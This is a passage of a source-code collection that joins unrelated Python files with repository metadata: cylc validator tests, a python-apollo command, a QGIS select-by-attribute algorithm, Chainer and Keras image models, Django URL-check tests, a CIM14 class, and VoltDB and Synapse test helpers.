(['a', 'b'], 'a\nb')
]:
assert validator.coerce_str(value, ['whatever']) == result
def test_coerce_str_list():
"""Test coerce_str_list."""
validator = ParsecValidator()
# The good
for value, results in [
('', []),
('Hello', ['Hello']),
('"Hello"', ['Hello']),
('1', ['1']),
('Mercury, Venus, Earth, Mars',
['Mercury', 'Venus', 'Earth', 'Mars']),
('Mercury, Venus, Earth, Mars,\n"Jupiter",\n"Saturn"\n',
['Mercury', 'Venus', 'Earth', 'Mars', 'Jupiter', 'Saturn']),
('New Zealand, United Kingdom',
['New Zealand', 'United Kingdom'])
]:
assert validator.coerce_str_list(value, ['whatever']) == results
def test_strip_and_unquote():
with pytest.raises(IllegalValueError):
ParsecValidator.strip_and_unquote(['a'], '"""')
def test_strip_and_unquote_list_parsec():
"""Test strip_and_unquote_list using ParsecValidator."""
for value, results in [
('"a"\n"b"', ['a', 'b']),
('"a", "b"', ['a', 'b']),
('"a", "b"', ['a', 'b']),
('"c" # d', ['c']),
('"a", "b", "c" # d', ['a', 'b', 'c']),
('"a"\n"b"\n"c" # d', ['a', 'b', 'c']),
("'a', 'b'", ['a', 'b']),
("'c' #d", ['c']),
("'a', 'b', 'c' # d", ['a', 'b', 'c']),
("'a'\n'b'\n'c' # d", ['a', 'b', 'c']),
('a, b, c,', ['a', 'b', 'c']),
('a, b, c # d', ['a', 'b', 'c']),
('a, b, c\n"d"', ['a', 'b', 'd']),
('a, b, c\n"d" # e', ['a', 'b', '"d"'])
]:
assert results == ParsecValidator.strip_and_unquote_list(
['a'], value)
def test_strip_and_unquote_list_cylc(strip_and_unquote_list):
"""Test strip_and_unquote_list using CylcConfigValidator."""
validator = VDR()
for values in strip_and_unquote_list:
value = values[0]
expected = values[1]
output = validator.strip_and_unquote_list(keys=[], value=value)
assert expected == output
def test_strip_and_unquote_list_multiparam():
with pytest.raises(ListValueError):
ParsecValidator.strip_and_unquote_list(
['a'], 'a, b, c<a,b>'
)
def test_coerce_cycle_point():
"""Test coerce_cycle_point."""
validator = VDR()
# The good
for value, result in [
('', None),
('3', '3'),
('2018', '2018'),
('20181225T12Z', '20181225T12Z'),
('2018-12-25T12:00+11:00', '2018-12-25T12:00+11:00')]:
assert validator.coerce_cycle_point(value, ['whatever']) == result
# The bad
for value in [
'None', ' Who cares? ', 'True', '1, 2', '20781340E10']:
with pytest.raises(IllegalValueError):
validator.coerce_cycle_point(value, ['whatever'])
def test_coerce_cycle_point_format():
"""Test coerce_cycle_point_format."""
validator = VDR()
# The good
for value, result in [
('', None),
('%Y%m%dT%H%M%z', '%Y%m%dT%H%M%z'),
('CCYYMMDDThhmmZ', 'CCYYMMDDThhmmZ'),
('XCCYYMMDDThhmmZ', 'XCCYYMMDDThhmmZ')]:
assert (
validator.coerce_cycle_point_format(value, ['whatever'])
== result
)
# The bad
# '/' and ':' not allowed in cylc cycle points (they are used in paths).
for value in ['%i%j', 'Y/M/D', '%Y-%m-%dT%H:%MZ']:
with pytest.raises(IllegalValueError):
validator.coerce_cycle_point_format(value, ['whatever'])
def test_coerce_cycle_point_time_zone():
"""Test coerce_cycle_point_time_zone."""
validator = VDR()
# The good
for value, result in [
('', None),
('Z', 'Z'),
('+0000', '+0000'),
('+0100', '+0100'),
('+1300', '+1300'),
('-0630', '-0630')]:
assert (
validator.coerce_cycle_point_time_zone(value, ['whatever'])
== result
)
# The bad
for value in ['None', 'Big Bang Time', 'Standard Galaxy Time']:
with pytest.raises(IllegalValueError):
validator.coerce_cycle_point_time_zone(value, ['whatever'])
def test_coerce_interval():
"""Test coerce_interval."""
validator = VDR()
# The good
for value, result in [
('', None),
('P3D', DurationFloat(259200)),
('PT10M10S', DurationFloat(610))]:
assert validator.coerce_interval(value, ['whatever']) == result
# The bad
for value in ['None', '5 days', '20', '-12']:
with pytest.raises(IllegalValueError):
validator.coerce_interval(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('', []),
('P3D', [DurationFloat(259200)]),
('P3D, PT10M10S', [DurationFloat(259200), DurationFloat(610)]),
('25*PT30M,10*PT1H',
[DurationFloat(1800)] * 25 + [DurationFloat(3600)] * 10)
]
)
def test_coerce_interval_list(value: str, expected: List[DurationFloat]):
"""Test coerce_interval_list."""
assert VDR.coerce_interval_list(value, ['whatever']) == approx(expected)
@pytest.mark.parametrize(
'value',
['None', '5 days', '20', 'PT10S, -12']
)
def test_coerce_interval_list__bad(value: str):
with pytest.raises(IllegalValueError):
VDR.coerce_interval_list(value, ['whatever'])
def test_coerce_parameter_list():
"""Test coerce_parameter_list."""
validator = VDR()
# The good
for value, result in [
('', []),
('planet', ['planet']),
('planet, star, galaxy', ['planet', 'star', 'galaxy']),
('1..5, 21..25', [1, 2, 3, 4, 5, 21, 22, 23, 24, 25]),
('-15, -10, -5, -1..1', [-15, -10, -5, -1, 0, 1])]:
assert validator.coerce_parameter_list(value, ['whatever']) == result
# The bad
for value in ['foo/bar', 'p1, 1..10', '2..3, 4, p']:
with pytest.raises(IllegalValueError):
validator.coerce_parameter_list(value, ['whatever'])
def test_coerce_xtrigger():
"""Test coerce_xtrigger."""
validator = VDR()
# The good
for value, result in [
('foo(x="bar")', 'foo(x=bar)'),
('foo(x, y, z="zebra")', 'foo(x, y, z=zebra)')]:
assert (
validator.coerce_xtrigger(value, ['whatever']).get_signature()
== result
)
# The bad
for value in [
'', 'foo(', 'foo)', 'foo,bar']:
with pytest.raises(IllegalValueError):
validator.coerce_xtrigger(value, ['whatever'])
def test_type_help_examples():
types = {
**ParsecValidator.V_TYPE_HELP,
**VDR.V_TYPE_HELP
}
validator = VDR()
for vdr, info in types.items():
coercer = validator.coercers[vdr]
if len(info) > 2:
for example in info[2]:
try:
coercer(example, [None])
except Exception:
raise Exception(
f'Example "{example}" failed for type "{vdr}"')
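# As a rough illustration of the list syntax the coercers above accept
# ("start..stop..step" ranges and "N*value" repetition), here is a minimal
# standalone sketch; it is not the cylc implementation, just a re-derivation
# of the same idea for integer lists:
def coerce_int_list_sketch(value):
    """Parse '1..5', '3*7' and plain integers into a flat list of ints."""
    items = []
    for chunk in value.split(','):
        chunk = chunk.strip()
        if not chunk:
            continue
        if '..' in chunk:
            parts = [int(p) for p in chunk.split('..')]
            start, stop = parts[0], parts[1]
            step = parts[2] if len(parts) > 2 else 1
            items.extend(range(start, stop + 1, step))
        elif '*' in chunk:
            count, _, val = chunk.partition('*')
            items.extend([int(val)] * int(count))
        else:
            items.append(int(chunk))
    return items
assert coerce_int_list_sketch('1..10, 11..20..2') == [
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19]
assert coerce_int_list_sketch('10*3, 4*-6') == [3] * 10 + [-6] * 4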
|
oliver-sanders/cylc
|
tests/unit/parsec/test_validate.py
|
Python
|
gpl-3.0
| 21,599
| 0
|
import click
from arrow.cli import pass_context, json_loads
from arrow.decorators import custom_exception, dict_output
@click.command('get_comments')
@click.argument("feature_id", type=str)
@click.option(
"--organism",
help="Organism Common Name",
type=str
)
@click.option(
"--sequence",
help="Sequence Name",
type=str
)
@pass_context
@custom_exception
@dict_output
def cli(ctx, feature_id, organism="", sequence=""):
"""Get a feature's comments
Output:
A standard apollo feature dictionary ({"features": [{...}]})
"""
return ctx.gi.annotations.get_comments(feature_id, organism=organism, sequence=sequence)
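# A self-contained sketch of exercising a command with this option layout via
# Click's test runner (hypothetical demo command, not part of python-apollo,
# so no Apollo server is required):
import click
from click.testing import CliRunner
@click.command('get_comments_demo')
@click.argument('feature_id', type=str)
@click.option('--organism', help='Organism Common Name', type=str, default='')
def get_comments_demo(feature_id, organism):
    """Echo the arguments instead of calling a real Apollo server."""
    click.echo('feature=%s organism=%s' % (feature_id, organism))
result = CliRunner().invoke(get_comments_demo, ['feat-1', '--organism', 'yeast'])
assert result.output.strip() == 'feature=feat-1 organism=yeast'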
|
erasche/python-apollo
|
arrow/commands/annotations/get_comments.py
|
Python
|
mit
| 652
| 0.001534
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SelectByAttribute.py
---------------------
Date : May 2010
Copyright : (C) 2010 by Michael Minn
Email : pyqgis at michaelminn dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Michael Minn'
__date__ = 'May 2010'
__copyright__ = '(C) 2010, Michael Minn'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from qgis.PyQt.QtCore import QVariant
from qgis.core import (QgsExpression,
QgsProcessingException,
QgsProcessingParameterVectorLayer,
QgsProcessingParameterField,
QgsProcessingParameterEnum,
QgsProcessingParameterString,
QgsProcessingOutputVectorLayer)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class SelectByAttribute(QgisAlgorithm):
INPUT = 'INPUT'
FIELD = 'FIELD'
OPERATOR = 'OPERATOR'
VALUE = 'VALUE'
OUTPUT = 'OUTPUT'
OPERATORS = ['=',
'!=',
'>',
'>=',
'<',
'<=',
'begins with',
'contains',
'is null',
'is not null',
'does not contain'
]
STRING_OPERATORS = ['begins with',
'contains',
'does not contain']
def tags(self):
return self.tr('select,attribute,value,contains,null,field').split(',')
def group(self):
return self.tr('Vector selection')
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.i18n_operators = ['=',
'!=',
'>',
'>=',
'<',
'<=',
self.tr('begins with'),
self.tr('contains'),
self.tr('is null'),
self.tr('is not null'),
self.tr('does not contain')
]
self.addParameter(QgsProcessingParameterVectorLayer(self.INPUT, self.tr('Input layer')))
self.addParameter(QgsProcessingParameterField(self.FIELD,
self.tr('Selection attribute'), parentLayerParameterName=self.INPUT))
self.addParameter(QgsProcessingParameterEnum(self.OPERATOR,
self.tr('Operator'), self.i18n_operators))
self.addParameter(QgsProcessingParameterString(self.VALUE, self.tr('Value')))
self.addOutput(QgsProcessingOutputVectorLayer(self.OUTPUT, self.tr('Selected (attribute)')))
def name(self):
return 'selectbyattribute'
def displayName(self):
return self.tr('Select by attribute')
def processAlgorithm(self, parameters, context, feedback):
layer = self.parameterAsVectorLayer(parameters, self.INPUT, context)
fieldName = self.parameterAsString(parameters, self.FIELD, context)
operator = self.OPERATORS[self.parameterAsEnum(parameters, self.OPERATOR, context)]
value = self.parameterAsString(parameters, self.VALUE, context)
fields = layer.fields()
idx = layer.fields().lookupField(fieldName)
fieldType = fields[idx].type()
if fieldType != QVariant.String and operator in self.STRING_OPERATORS:
op = ''.join(['"%s", ' % o for o in self.STRING_OPERATORS])
raise QgsProcessingException(
self.tr('Operators {0} can be used only with string fields.').format(op))
field_ref = QgsExpression.quotedColumnRef(fieldName)
quoted_val = QgsExpression.quotedValue(value)
if operator == 'is null':
expression_string = '{} IS NULL'.format(field_ref)
elif operator == 'is not null':
expression_string = '{} IS NOT NULL'.format(field_ref)
elif operator == 'begins with':
expression_string = """%s LIKE '%s%%'""" % (field_ref, value)
elif operator == 'contains':
expression_string = """%s LIKE '%%%s%%'""" % (field_ref, value)
elif operator == 'does not contain':
expression_string = """%s NOT LIKE '%%%s%%'""" % (field_ref, value)
else:
expression_string = '{} {} {}'.format(field_ref, operator, quoted_val)
expression = QgsExpression(expression_string)
if expression.hasParserError():
raise QgsProcessingException(expression.parserErrorString())
layer.selectByExpression(expression_string)
return {self.OUTPUT: parameters[self.INPUT]}
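# For reference, the expression strings built above look like the following;
# this is a simplified standalone sketch (plain quoting instead of the
# QgsExpression helpers) so it runs without a QGIS install:
def _expression_sketch(field, operator, value):
    field_ref = '"%s"' % field      # simplified stand-in for quotedColumnRef
    quoted_val = "'%s'" % value     # simplified stand-in for quotedValue
    if operator == 'is null':
        return '%s IS NULL' % field_ref
    if operator == 'begins with':
        return "%s LIKE '%s%%'" % (field_ref, value)
    if operator == 'contains':
        return "%s LIKE '%%%s%%'" % (field_ref, value)
    return '%s %s %s' % (field_ref, operator, quoted_val)
assert _expression_sketch('name', 'begins with', 'Lake') == '"name" LIKE \'Lake%\''
assert _expression_sketch('population', '>', '1000') == '"population" > \'1000\''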
|
nirvn/QGIS
|
python/plugins/processing/algs/qgis/SelectByAttribute.py
|
Python
|
gpl-2.0
| 5,528
| 0.001447
|
import chainer
import chainer.functions as F
import chainer.links as L
class vgga(chainer.Chain):
insize = 224
def __init__(self):
super(vgga, self).__init__()
with self.init_scope():
self.conv1 = L.Convolution2D( 3, 64, 3, stride=1, pad=1)
self.conv2 = L.Convolution2D( 64, 128, 3, stride=1, pad=1)
self.conv3 = L.Convolution2D(128, 256, 3, stride=1, pad=1)
self.conv4 = L.Convolution2D(256, 256, 3, stride=1, pad=1)
self.conv5 = L.Convolution2D(256, 512, 3, stride=1, pad=1)
self.conv6 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv7 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv8 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.fc6 = L.Linear(512 * 7 * 7, 4096)
self.fc7 = L.Linear(4096, 4096)
self.fc8 = L.Linear(4096, 1000)
def forward(self, x):
h = F.max_pooling_2d(F.relu(self.conv1(x)), 2, stride=2)
h = F.max_pooling_2d(F.relu(self.conv2(h)), 2, stride=2)
h = F.relu(self.conv3(h))
h = F.max_pooling_2d(F.relu(self.conv4(h)), 2, stride=2)
h = F.relu(self.conv5(h))
h = F.max_pooling_2d(F.relu(self.conv6(h)), 2, stride=2)
h = F.relu(self.conv7(h))
h = F.max_pooling_2d(F.relu(self.conv8(h)), 2, stride=2)
h = F.relu(self.fc6(h))
h = F.relu(self.fc7(h))
return self.fc8(h)
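# A quick shape check of the network above (assumes chainer and numpy are
# installed; weights are random, so only the output shape is meaningful):
if __name__ == '__main__':
    import numpy as np
    model = vgga()
    x = np.zeros((1, 3, vgga.insize, vgga.insize), dtype=np.float32)
    y = model.forward(x)
    assert y.shape == (1, 1000)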
|
soumith/convnet-benchmarks
|
chainer/vgga.py
|
Python
|
mit
| 1,463
| 0.001367
|
from django.core.checks.urls import check_url_config
from django.test import SimpleTestCase
from django.test.utils import override_settings
class CheckUrlsTest(SimpleTestCase):
@override_settings(ROOT_URLCONF='check_framework.urls_no_warnings')
def test_include_no_warnings(self):
result = check_url_config(None)
self.assertEqual(result, [])
@override_settings(ROOT_URLCONF='check_framework.urls_include')
def test_include_with_dollar(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W001')
expected_msg = "Your URL pattern '^include-with-dollar$' uses include with a regex ending with a '$'."
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_slash')
def test_url_beginning_with_slash(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W002')
expected_msg = "Your URL pattern '/starting-with-slash/$' has a regex beginning with a '/'"
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_name')
def test_url_pattern_name_with_colon(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W003')
expected_msg = "Your URL pattern '^$' [name='name_with:colon'] has a name including a ':'."
self.assertIn(expected_msg, warning.msg)
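# The point of the urls.W001 check above: a regex that ends with '$' before
# include() can never delegate to the included patterns. A Django-free
# illustration of the underlying regex behaviour:
import re
outer = re.compile('^include-with-dollar$')
# Django strips the matched prefix and hands the remainder to the included
# urlconf; with a trailing '$' there is never any remainder to hand over.
assert outer.match('include-with-dollar')
assert outer.match('include-with-dollarsub/') is None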
|
cainmatt/django
|
tests/check_framework/test_urls.py
|
Python
|
bsd-3-clause
| 1,638
| 0.001832
|
"""Find all models written by user Hutton, including the DOI and the
source code repository for each model.
"""
from ask_api_examples import make_query
query = '[[Last name::Hutton]]|?DOI model|?Source web address'
def main():
r = make_query(query, __file__)
return r
if __name__ == '__main__':
print main()
|
mdpiper/csdms-wiki-api-examples
|
ask_api_examples/list_model_repo_doi.py
|
Python
|
mit
| 327
| 0
|
# -*- coding: utf-8 -*-
"""Xception V1 model for Keras.
On ImageNet, this model gets to a top-1 validation accuracy of 0.790
and a top-5 validation accuracy of 0.945.
Do note that the input image format for this model is different than for
the VGG16 and ResNet models (299x299 instead of 224x224),
and that the input preprocessing function
is also different (same as Inception V3).
Also do note that this model is only available for the TensorFlow backend,
due to its reliance on `SeparableConvolution` layers.
# Reference
- [Xception: Deep Learning with Depthwise Separable Convolutions](https://arxiv.org/abs/1610.02357)
"""
from __future__ import print_function
from __future__ import absolute_import
import warnings
from ..models import Model
from .. import layers
from ..layers import Dense
from ..layers import Input
from ..layers import BatchNormalization
from ..layers import Activation
from ..layers import Conv2D
from ..layers import SeparableConv2D
from ..layers import MaxPooling2D
from ..layers import GlobalAveragePooling2D
from ..layers import GlobalMaxPooling2D
from ..engine.topology import get_source_inputs
from ..utils.data_utils import get_file
from .. import backend as K
from .imagenet_utils import decode_predictions
from .imagenet_utils import _obtain_input_shape
TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.4/xception_weights_tf_dim_ordering_tf_kernels.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.4/xception_weights_tf_dim_ordering_tf_kernels_notop.h5'
def Xception(include_top=True, weights='imagenet',
input_tensor=None, input_shape=None,
pooling=None,
classes=1000):
"""Instantiates the Xception architecture.
Optionally loads weights pre-trained
on ImageNet. This model is available for TensorFlow only,
and can only be used with inputs following the TensorFlow
data format `(width, height, channels)`.
You should set `image_data_format="channels_last"` in your Keras config
located at ~/.keras/keras.json.
Note that the default input image size for this model is 299x299.
# Arguments
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization)
or "imagenet" (pre-training on ImageNet).
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
            has to be `(299, 299, 3)`).
It should have exactly 3 inputs channels,
and width and height should be no smaller than 71.
E.g. `(150, 150, 3)` would be one valid value.
pooling: Optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional layer.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional layer, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
# Returns
A Keras model instance.
# Raises
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
RuntimeError: If attempting to run this model with a
backend that does not support separable convolutions.
"""
if weights not in {'imagenet', None}:
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or `imagenet` '
'(pre-training on ImageNet).')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as imagenet with `include_top`'
' as true, `classes` should be 1000')
if K.backend() != 'tensorflow':
raise RuntimeError('The Xception model is only available with '
'the TensorFlow backend.')
if K.image_data_format() != 'channels_last':
warnings.warn('The Xception model is only available for the '
'input data format "channels_last" '
'(width, height, channels). '
'However your settings specify the default '
'data format "channels_first" (channels, width, height). '
'You should set `image_data_format="channels_last"` in your Keras '
'config located at ~/.keras/keras.json. '
'The model being returned right now will expect inputs '
'to follow the "channels_last" data format.')
K.set_image_data_format('channels_last')
old_data_format = 'channels_first'
else:
old_data_format = None
# Determine proper input shape
input_shape = _obtain_input_shape(input_shape,
default_size=299,
min_size=71,
data_format=K.image_data_format(),
include_top=include_top)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
x = Conv2D(32, (3, 3), strides=(2, 2), use_bias=False, name='block1_conv1')(img_input)
x = BatchNormalization(name='block1_conv1_bn')(x)
x = Activation('relu', name='block1_conv1_act')(x)
x = Conv2D(64, (3, 3), use_bias=False, name='block1_conv2')(x)
x = BatchNormalization(name='block1_conv2_bn')(x)
x = Activation('relu', name='block1_conv2_act')(x)
residual = Conv2D(128, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv1')(x)
x = BatchNormalization(name='block2_sepconv1_bn')(x)
x = Activation('relu', name='block2_sepconv2_act')(x)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv2')(x)
x = BatchNormalization(name='block2_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block2_pool')(x)
x = layers.add([x, residual])
residual = Conv2D(256, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block3_sepconv1_act')(x)
x = SeparableConv2D(256, (3, 3), padding='same', use_bias=False, name='block3_sepconv1')(x)
x = BatchNormalization(name='block3_sepconv1_bn')(x)
x = Activation('relu', name='block3_sepconv2_act')(x)
x = SeparableConv2D(256, (3, 3), padding='same', use_bias=False, name='block3_sepconv2')(x)
x = BatchNormalization(name='block3_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block3_pool')(x)
x = layers.add([x, residual])
residual = Conv2D(728, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block4_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv1')(x)
x = BatchNormalization(name='block4_sepconv1_bn')(x)
x = Activation('relu', name='block4_sepconv2_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv2')(x)
x = BatchNormalization(name='block4_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block4_pool')(x)
x = layers.add([x, residual])
for i in range(8):
residual = x
prefix = 'block' + str(i + 5)
x = Activation('relu', name=prefix + '_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv1')(x)
x = BatchNormalization(name=prefix + '_sepconv1_bn')(x)
x = Activation('relu', name=prefix + '_sepconv2_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv2')(x)
x = BatchNormalization(name=prefix + '_sepconv2_bn')(x)
x = Activation('relu', name=prefix + '_sepconv3_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv3')(x)
x = BatchNormalization(name=prefix + '_sepconv3_bn')(x)
x = layers.add([x, residual])
residual = Conv2D(1024, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block13_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block13_sepconv1')(x)
x = BatchNormalization(name='block13_sepconv1_bn')(x)
x = Activation('relu', name='block13_sepconv2_act')(x)
x = SeparableConv2D(1024, (3, 3), padding='same', use_bias=False, name='block13_sepconv2')(x)
x = BatchNormalization(name='block13_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block13_pool')(x)
x = layers.add([x, residual])
x = SeparableConv2D(1536, (3, 3), padding='same', use_bias=False, name='block14_sepconv1')(x)
x = BatchNormalization(name='block14_sepconv1_bn')(x)
x = Activation('relu', name='block14_sepconv1_act')(x)
x = SeparableConv2D(2048, (3, 3), padding='same', use_bias=False, name='block14_sepconv2')(x)
x = BatchNormalization(name='block14_sepconv2_bn')(x)
x = Activation('relu', name='block14_sepconv2_act')(x)
if include_top:
x = GlobalAveragePooling2D(name='avg_pool')(x)
x = Dense(classes, activation='softmax', name='predictions')(x)
else:
if pooling == 'avg':
x = GlobalAveragePooling2D()(x)
elif pooling == 'max':
x = GlobalMaxPooling2D()(x)
# Ensure that the model takes into account
# any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
model = Model(inputs, x, name='xception')
# load weights
if weights == 'imagenet':
if include_top:
weights_path = get_file('xception_weights_tf_dim_ordering_tf_kernels.h5',
TF_WEIGHTS_PATH,
cache_subdir='models')
else:
weights_path = get_file('xception_weights_tf_dim_ordering_tf_kernels_notop.h5',
TF_WEIGHTS_PATH_NO_TOP,
cache_subdir='models')
model.load_weights(weights_path)
if old_data_format:
K.set_image_data_format(old_data_format)
return model
def preprocess_input(x):
x /= 255.
x -= 0.5
x *= 2.
return x
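# Typical use of the model and helpers defined above (needs a TensorFlow-backed
# Keras install and network access for the weight download; 'elephant.jpg' is
# a placeholder image path):
if __name__ == '__main__':
    import numpy as np
    from keras.preprocessing import image
    model = Xception(include_top=True, weights='imagenet')
    img = image.load_img('elephant.jpg', target_size=(299, 299))
    x = preprocess_input(np.expand_dims(image.img_to_array(img), axis=0))
    preds = model.predict(x)
    print(decode_predictions(preds, top=3))  # [[(class, description, probability), ...]]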
|
bbenligiray/keras_models
|
not_used/xception.py
|
Python
|
mit
| 11,593
| 0.002156
|
def f():
try:
a = 1
except:
b = 1
|
idea4bsd/idea4bsd
|
python/testData/copyPaste/Whitespace.after.py
|
Python
|
apache-2.0
| 59
| 0.016949
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.Element import Element
class LineDetail(Element):
"""Details on an amount line, with rounding, date and note.
"""
def __init__(self, dateTime='', rounding=0.0, note='', amount=0.0, *args, **kw_args):
"""Initialises a new 'LineDetail' instance.
@param dateTime: Date and time when this line was created in the application process.
@param rounding: Totalised monetary value of all errors due to process rounding or truncating that is not reflected in 'amount'.
@param note: Free format note relevant to this line.
@param amount: Amount for this line item.
"""
#: Date and time when this line was created in the application process.
self.dateTime = dateTime
#: Totalised monetary value of all errors due to process rounding or truncating that is not reflected in 'amount'.
self.rounding = rounding
#: Free format note relevant to this line.
self.note = note
#: Amount for this line item.
self.amount = amount
super(LineDetail, self).__init__(*args, **kw_args)
_attrs = ["dateTime", "rounding", "note", "amount"]
_attr_types = {"dateTime": str, "rounding": float, "note": str, "amount": float}
_defaults = {"dateTime": '', "rounding": 0.0, "note": '', "amount": 0.0}
_enums = {}
_refs = []
_many_refs = []
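# LineDetail is a plain attribute container; a minimal construction example
# (assumes the CIM14 Element base class accepts default construction, as the
# keyword-only __init__ above suggests):
if __name__ == '__main__':
    line = LineDetail(dateTime='2011-06-01T12:00:00Z', rounding=0.004,
                      note='VAT rounding', amount=12.5)
    assert line.amount == 12.5
    assert LineDetail._attr_types['rounding'] is float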
|
rwl/PyCIM
|
CIM14/IEC61968/PaymentMetering/LineDetail.py
|
Python
|
mit
| 2,482
| 0.004432
|
#!/usr/bin/env python
# This file is part of VoltDB.
# Copyright (C) 2008-2010 VoltDB Inc.
#
# VoltDB is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# VoltDB is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
testspec = """
class Database {
/** test comment */
// more comments
Partition* partitions; // more comments
Table* tables;
Program* programs;
Procedure* procedures;
}
/*
class Garbage {
Garbage garbage;
}
*/
class Partition {
bool isActive;
Range* ranges;
Replica* replicas;
}
class Table {
int type;
Table? buddy1;
Table? buddy2;
Column* columns;
Index* indexes;
Constraint* constraints;
}
class Program {
Program* programs;
Procedure* procedures;
Table* tables;
}
"""
def checkeq( a, b ):
if a != b:
raise Exception( 'test failed: %r != %r' % (a,b) )
|
apavlo/h-store
|
src/catgen/catalog_utils/testdata.py
|
Python
|
gpl-3.0
| 1,429
| 0.004899
|
# -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# twisted imports
from twisted.internet import defer
# trial imports
from tests import unittest
from synapse.api.constants import Membership
import json
import time
class RestTestCase(unittest.TestCase):
"""Contains extra helper functions to quickly and clearly perform a given
REST action, which isn't the focus of the test.
This subclass assumes there are mock_resource and auth_user_id attributes.
"""
def __init__(self, *args, **kwargs):
super(RestTestCase, self).__init__(*args, **kwargs)
self.mock_resource = None
